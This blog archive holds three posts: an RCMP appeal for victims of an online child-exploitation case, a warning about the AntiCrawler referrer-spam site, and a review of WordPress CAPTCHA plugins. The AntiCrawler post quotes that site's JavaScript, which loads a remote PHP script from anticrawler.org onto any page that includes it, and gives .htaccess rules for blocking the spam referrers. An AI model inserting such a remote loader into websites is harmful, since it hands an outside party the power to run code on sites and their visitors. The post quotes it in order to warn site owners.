Category Archives: Abuse

Local man tricks upto 2000 boys into exposing themselves online

I don’t think kids are getting the message, allowing anything that you would not be comfortable for your mother to see, should never be allowed onto any digital device, from explicit text messages to embarrassing pictures, never, I don’t know if the effect on this preditors victims has been so fatal as this previous story where a number of kids lost their lives.

The Local RCMP have issued this video calling for victims to come forward.

 

 

From the RCMP Website here

The New Brunswick RCMP’s Internet Child Exploitation Unit is seeking the public’s help to identify victims of a man who had been sexually exploiting boys online from at least January 2012 until the fall of 2014.

Investigators have determined that this man was luring boys online by pretending to be a teenaged girl. The investigation indicates the possible victims are as young as 10 and up to 16 years old and may not even be aware they have been victimized. Police have charged a 24-year-old Moncton man, who cannot be named because of a court ordered publication ban, with several sex offences.

In addition to those offences, the investigation has shown the man contacted boys through live video chats on various social media sites. He used a video of a teenaged girl that appeared to be live and convinced the boys to undress and initiate sex acts which he then taped and distributed via the Internet. One chat website he used frequently was Omegle.com, a site that requires no username where people can chat with strangers from all over the world.

Investigators have determined that there could be as many as 2000 victims living in Canada, the United States, United Kingdom, the Netherlands, Australia and Russia and possibly elsewhere.  Police are asking anyone who may have been in contact with this man via video chat or email to contact their local police or call the Royal Canadian Mounted Police in New Brunswick at 1-506-452-3405 or by email at jdivice.divjueei@rcmp-grc.gc.ca

This man’s known online user names and email addresses are listed below.

Video Chat Names

  • Skype: Veronika.Maylae
  • Vichatter: Veronika69

Facebook Account

  • Vero May (www.facebook.com/vero.may.3950)

Email Addresses

  • boiyavi@hotmail.com
  • revolboy@hotmail.com
  • tigerjack@hotmail.com

“We know it may be difficult for victims and/or their families to come forward but their information is very important to the investigation and could help prevent similar crimes by online predators,” says Sgt. Jean Marc Paré of the New Brunswick RCMP.  “Police want to be able to speak to as many victims as possible to assist with the investigation.”

The RCMP investigation into this case in New Brunswick started in the fall of 2014 as the result of information uncovered by York Regional Police during an investigation entitled Project Hydra.

The RCMP in New Brunswick has released a video about this investigation on social media and is asking the public to view it and then share it via their social media channels in order to reach as many potential victims as possible.

Anyone with information on these crimes can report their information anonymously through Crime Stoppers at www.crimenb.ca or by calling 1-800-222-TIPS (8477).

Contact Information

Cst. Jullie Rogers-Marsh
Media Relations Officers
RCMP in New Brunswick
506-452-4252

 

 

 

AntiCrawler, referrer spam turned nasty

AntiCrawler, referrer spam turned nasty, asking you to add potentially malicious code to your own site.

anticrawlerAlthough this is by far not the most popular blog, I do like to look in each day to check up on things, and I often see referrer spam, I always checkout what they are up to, it is a form of advertising, they show up in your site logs and analytics, of course you are going to check who’s sending you traffic, it’s nearly always “SEO” or marketing companies offering you more traffic, you can guess the quality of traffic they would provide just looking at their advertising method.

But the referral spam anticrawler.org  bot left a couple entries for yesterday is different, when I click through to it, a single page ironically telling you that if you “Put this JS to all pages of your website and you’ll never see BAD bots and crawlers”, the idea is ludicrous that some technology would “ping” crawlers to inform them not crawl your site, the script calls to include a PHP file anticrawler.php which will load from their site

<script>
document.write('<script src="//anticrawler.org/plugin/anticrawler.php?u=' + encodeURIComponent(document.location.href) + '"></' + 'script>');
</script>

When I open anticrawler.php, all it has in but to print to the screen this totally benign line of commented out code which does absolutely nothing:

//Pinging bots

But tomorrow it could be anything, as they can now run any code from your machine, I can only guess what the end game is here, maybe they haven’t decided yet, inject spam, add a backdoor to your site or server, launch attacks on other sites, or just infect your sites visitors with some other malware.

Of course you should not trust anyone using referral spam, the entries in your stats and analytics themselves are are not harmful, but they can be annoying in that they spoil the accuracy of the data you are collecting, so if you want to block AntiCrawler and other referrer spam, you can add a list to your .htaccess file in this format:

RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} http://anticrawler\.org [NC,OR]
RewriteCond %{HTTP_REFERER}ready-to-go\.com [NC,OR]
RewriteCond %{HTTP_REFERER} seamalt\.com
RewriteRule .* - [F]

Notice that all but the last entry has [NC,OR] at the end of the line and the \ before the .org is required.

Blog Spammers and which CAPTCHA, 5 reviewed

CAPTCHA, standing for “Completely Automated Public Turing test to tell Computers and Humans Apart” has been around since 2000, so was already fairly well developed when the bots started targeting blogs, guest books and wiki’s which are the main target of those peddling their commercial junk surfaced a couple of years later.

captcha

Over the years I have used many, both as a consumer and as developer, on projects the choice is usually left to me, what’s happened a couple of times is a default installation CMS comes with a CAPTCHA pre-installed to protect forms, normally a comment, contact or registration form, this will work fine for a couple of weeks, then when the bots find the page, it will inundate them with abuse.

Some forms like the talent application on ImageFolio are fairly resistant by design to abuse as they are asking questions which will mean very little to a spammer bot, the page name “become_a_model” will mean nothing to them, I have though left a very simple CAPTCHA there in case I need to improve on the feature in the future, and it won’t be too much of a shock to clients.

Quite often the CAPTCHA systems need to be tightened up on by increasing complexity, if it’s still not doing its job, replace it, I wish that wasn’t the case, but the bot developers are well funded, and the abuse must continue, the sales of backlinks on fiverr.com with prices as low as 1500 for $5 have to be fulfilled somehow.

My biggest problem with these spammers these days is not the actual spam, on blog installations it’s the sheer number of fake accounts they create, the actual spam is caught by a spam filter, but the abusers insistence on creating accounts even though I often allow commenting on sites without the need to log in, anonymous commenting.

Anyway, here’s a short write up on a few CAPTCHA’s I’m using on WordPress.

The criteria I will measure them by, are number of false positives (people miss-entering) compared to ability of spammers circumventing (spam comments or accounts).

botdetectBotDetect, they have a very wide variety of platforms supported, with free and paid options, the users of their library are impressive including many international Government departments. I haven’t opted yet for the paid version, the only advantage would be the removal of the branding which clients have not complained about. Classic fairly simple to read distorted text puzzle, I am guessing what gives it the edge on others are the changing backgrounds that challenge the Bots.

Setup is not simple, requiring not just the installation using WordPress’s add plugin feature, but also the need to upload the libraries to the wp-content folder and move to another directory. But once it’s there, it’s very simple with options to protect Login, Comments, User Registration and Lost Passwords, and the expected control of character numbers and CAPTCHA size. There is also an option to disable audio, I would suggest this is removed, I can’t think of an instance where you would want to exclude the visually impaired. Support for feedback and contact forms is missing, but I am told by the developer they are working on this feature now.

sweetcaptureSweetCaptcha, most CMS platforms supported, single free no strings offering, not the normal distorted text, but a drag and drop puzzle to solve, I have heard of some problems on certain devices when completing the puzzle, but have not seen the evidence and was unable to replicate, even my normally fussy “noscript” Firefox and antique Windows phone were happy with it, a unique fun design with some amusing themes which you can switch between, can be applied to any input form on a CMS from what I can tell. I have not seen a bot able to solve the puzzle, but I have seen a lot of users get it wrong first and second time, I have no idea why, maybe a language thing, in this case this case maybe I don’t know what Victors favorite colour is? I’d suggest they research their puzzles a bit more and add an audio option, which I think is essential and is noticeably missing.

UPDATE 9th June 2015: SweetCaptcha has been serving malware via their script, I am sorry to have recommended them, use at your own risk.

reCaptchareCAPTCHA, made and used by google, offered for free and fully open source, it’s bundled in a number of plugins for WordPress but not as a plugin itself, fairly easy to use only needing the input of a API key to get going after installing whatever plugin it came bundled with.  I believe for a long time this was the best available, I have seen bots bypass it, and quite quickly the developers improved it. But again, people do have a lot of problems reading the distorted text, to the point of giving up on them and resorting to the audio when they obviously have good eyesight. There is a variety of options, but not on puzzle strength, layout of the widget and colour / style options available. There is a large community of developers integrating reCAPTCHA into systems, which is both the reason abusers occasionally circumvent it and updates to code are quickly developed.

bestwebCaptcha by BestWeb, available stand alone, free and paid and bundled with many of Best Web Soft’s other popular plugins, which are all very simple to use, it’s simple mathematical challenges personally I find easier than any other, nearly second nature, I think the bots unless the text numbers are enabled (one, two..) don’t see this CAPTCHA as much of a challenge, I have tested this on some heavily targeted sites and it was next to useless in stopping the 100+ fake signups a day they were suffering. That said, many people seem happy with it. The fact that it is bundled with so many other plugins leaves me a little surprised that they haven’t improved on it.

sicaptchaSI CAPTCHA, I won’t go into too much details, for a long time it was good at what it did, stopping spam and their associated accounts, traditional distorted text, more readable (to me anyway) than most with few fails. Easy to install but does little to stop abuse now, I did hear that maybe spammers had found another way of bypassing the puzzle, not actually solving it, maybe even looking for forms that use this CAPTCHA solution, I’ve been unable to find a link to that discussion now, so can’t be certain, will update if I find it.

asirraAsirra, An interesting open source project sponsored by Microsoft that I watched develop for a few years, that leveraged humans unique ability and enjoyment of separating pictures of kittens and puppies, sadly after many attempts at bringing it to the masses Assira’s potential doesn’t seem to have been realized. I am sure themed versions would be very popular if they were applied to the subject matter of the site, say male and female models for a model agency.

Summary

For me, at the moment BotDetect, although still in beta has the lowest false positive (people miss-entering) compared to spammers able to abuse, very suitable for high volume traffic sites, anxiously waiting on their contact form support. For a light traffic site that is not being targeted that can get away with the unique look you should go for SweetCaptcha and any that can’t sorry I can’t really recommend one. Of course you maybe forced to use the solution supplied with your plugin (contact forms etc.), or may be you should choose your plugin based on the CAPTCHA they employ.

Keep in mind that the developers maybe fixing any shortcomings I have mentioned whilst I type, or that I am praising a solution that could be circumvented tomorrow, read the current reviews, and be prepared to switch out, maybe very quickly, which may not be so easy if they are tied to another plugin you are dependent on. Feedback on this article very welcome, of course not by spammers.